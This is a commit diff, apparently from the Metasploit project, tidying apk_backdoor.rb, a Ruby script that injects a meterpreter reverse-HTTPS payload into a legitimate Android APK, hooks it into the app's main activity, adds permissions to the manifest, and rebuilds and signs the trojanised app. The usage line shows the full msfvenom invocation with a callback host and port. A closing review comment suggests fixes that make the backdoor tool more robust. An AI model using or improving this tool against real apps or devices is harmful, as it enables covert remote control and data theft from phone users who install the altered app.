clean up apk_backdoor.rb

bug/bundler_fix
Tim 2015-12-22 06:10:15 +00:00
parent ad0ff2ea2f
commit d1ed363a94
1 changed files with 10 additions and 8 deletions


@ -11,6 +11,10 @@ require 'fileutils'
require 'optparse'
require 'open3'
def usage
$stderr.puts "Usage: #{$0} [target.apk] [msfvenom options]\n"
$stderr.puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n"
end
def run_cmd(cmd)
begin
@ -142,8 +146,7 @@ end
apkfile = ARGV[0]
unless apkfile && File.readable?(apkfile)
$stderr.puts "Usage: #{$0} [target.apk] [msfvenom options]\n"
$stderr.puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n"
usage
exit(1)
end
@ -173,9 +176,8 @@ begin
opts+=" "
}
rescue
$stderr.puts "Usage: #{$0} [target.apk] [msfvenom options]\n"
$stderr.puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n"
$stderr.puts "[-] Error parsing msfvenom options. Exiting.\n"
usage
exit(1)
end
@ -183,7 +185,7 @@ end
tempdir = Dir.mktmpdir
print "[*] Generating msfvenom payload..\n"
msfvenom_path = File.expand_path(File.join(File.dirname(__FILE__), "..", "msfvenom"))
msfvenom_path = File.expand_path(File.join(File.dirname(__FILE__), "..", "..", "msfvenom"))
res = run_cmd("#{msfvenom_path} -f raw #{opts} -o #{tempdir}/payload.apk 2>&1")
if res.downcase.include?("error")
$stderr.puts res
@ -230,14 +232,14 @@ payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/
hookedsmali = activitysmali.gsub(activitycreate, payloadhook)
print "[*] Loading ",smalifile," and injecting payload..\n"
File.open(smalifile, "wb") {|file| file.puts hookedsmali }
injected_apk=apkfile.split(".")[0] + "_backdoored.apk"
injected_apk = apkfile.sub('.apk', '_backdoored.apk')
print "[*] Poisoning the manifest with meterpreter permissions..\n"
fix_manifest(tempdir)
print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n"
print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n"
run_cmd("apktool b -o #{injected_apk} #{tempdir}/original")
print "[*] Signing #{injected_apk} ..\n"
print "[*] Signing #{injected_apk}\n"
run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey")
FileUtils.remove_entry tempdir
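Review bot: `apkfile.sub('.apk', '_backdoored.apk')` replaces the first `.apk` found anywhere in the path rather than the file extension, and when the argument contains no `.apk` at all the result equals `apkfile`, so the later `apktool b -o #{injected_apk}` would write over the input file. Anchoring on the extension covers both cases: `injected_apk = apkfile.sub(/\.apk\z/i, '') + '_backdoored.apk'`. The derived name is also interpolated unquoted into the `run_cmd` strings for apktool and jarsigner; `run_cmd`'s body is outside the hunk, but the `2>&1` in the msfvenom call suggests these strings reach a shell, so a path with spaces or shell metacharacters would be reinterpreted on the operator's own machine. Wrapping the paths in `Shellwords.escape` (which needs `require 'shellwords'`, not among the requires visible here) would close that.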